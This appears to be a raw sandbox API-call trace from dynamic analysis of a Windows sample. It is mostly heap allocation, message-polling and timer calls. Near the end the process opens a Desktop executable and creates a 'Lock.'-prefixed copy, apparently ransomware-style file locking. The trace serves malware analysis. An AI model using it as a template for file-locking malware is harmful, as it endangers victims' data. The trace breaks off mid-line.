RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0161.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0161.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0161.892] CryptDestroyHash (hHash=0xa872d0) returned 1 [0161.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0161.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0161.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0161.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0161.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0161.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0161.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0161.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0161.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0161.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0161.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0161.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0161.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0161.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0161.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0161.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0161.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0161.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0161.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0161.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0161.900] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0161.901] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.901] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0161.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0161.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0161.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0161.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0161.902] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0161.902] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0161.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0161.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0161.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0161.902] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0161.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0161.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0161.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0161.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3c7e008 [0161.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0161.904] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hexdecryptor.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0162.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0162.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0162.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0162.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0162.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0162.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0162.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0162.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0162.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0162.146] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0162.146] TranslateMessage (lpMsg=0x8cf708) returned 0 [0162.146] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0162.146] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0162.146] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0162.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0162.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0162.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0162.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0162.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0162.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0162.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0162.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0162.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0162.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0162.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0162.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0162.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0162.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 